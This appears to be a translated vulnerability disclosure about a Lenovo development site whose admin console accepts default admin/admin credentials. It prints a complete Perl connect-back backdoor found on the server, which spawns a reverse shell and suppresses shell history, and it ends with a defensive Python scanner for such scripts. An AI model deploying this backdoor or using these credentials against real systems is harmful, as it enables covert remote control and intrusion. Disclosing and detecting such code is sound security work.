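2015-04-03: Details reported to the vendor; awaiting vendor handling
2015-04-07: Vendor confirmed; details disclosed to the vendor only
2015-04-17: Details disclosed to core white hats and experts in the relevant field
2015-04-27: Details disclosed to regular white hats
2015-05-07: Details disclosed to intern white hats
2015-05-22: Details disclosed to the public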
lenovo
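1. Site: http://idinner1.dev.surepush.cn/
2. getshell: the admin-console management interface is present in its default configuration; logged in with admin/admin
3. Found a backdoor left by a foreigner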
#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#e.code@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by Error Code ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#e.code@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by Error Code ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by Error Code ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(error) gid=100(error) groups=100(error)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 Error Code ==-- \n\n";
if ($ARGC!=2) {
    print "Usage: $0 [Host] [Port] \n\n";
    die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by Error Code ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
You are more professional at this.
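A triage sketch for the backdoor in step 3, added here and not part of the original report: it sweeps a directory for script files that combine the traits visible in the quoted Perl script (outbound connect, STDIN/STDOUT/STDERR redirected to the socket, shell spawn, history suppression, banner). The function names, regexes, verdict labels and the benign sample are assumptions made for this example.

```python
import os
import re

# Traits taken from the connect-back script quoted in the report. Each is weak
# alone; together they mean "dial out, then wire a shell's stdio to the socket".
INDICATORS = {
    "outbound_connect": re.compile(r"\bconnect\s*\(\s*\w+\s*,\s*sockaddr_in\s*\("),
    "stdio_dup_to_socket": re.compile(r"open\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*[\"']>&\s*\w+[\"']"),
    "shell_spawn": re.compile(r"\b(?:system|exec)\s*\(\s*(?:\$\w+|[\"']/bin/(?:ba)?sh[\"'])"),
    "history_evasion": re.compile(r"unset\s+HISTFILE"),
    "banner": re.compile(r"ConnectBack\s+Backdoor", re.IGNORECASE),
}
CORE = ("outbound_connect", "stdio_dup_to_socket", "shell_spawn")

def scan(source):
    """Classify script text as 'connect-back shell', 'suspicious' or 'clean'."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    core = sum(name in hits for name in CORE)
    if core == 3:
        return "connect-back shell", hits
    if core == 2 or "history_evasion" in hits or "banner" in hits:
        return "suspicious", hits
    return "clean", hits

def scan_tree(root, max_bytes=1_000_000):
    """Scan every file under root (for example an app server deploy directory)."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    verdict, hits = scan(fh.read(max_bytes))
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if verdict != "clean":
                findings[path] = (verdict, hits)
    return findings

# Statements quoted from the script on this page (trimmed), used as test input.
SAMPLE_BACKDOOR = r'''
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a");
system($system);
'''
# Constructed benign script: a port health check that only connects.
SAMPLE_BENIGN = 'connect(S, sockaddr_in(80, inet_aton("127.0.0.1"))) or die "down\\n";\nprint "up\\n";\n'
```

Pattern matching like this is a triage aid for known variants; a renamed or obfuscated copy will not match, so findings should be paired with a review of what the admin-console account deployed.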
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-04-07 09:39
Thank you for your support of Lenovo's security work. Thank you.
None yet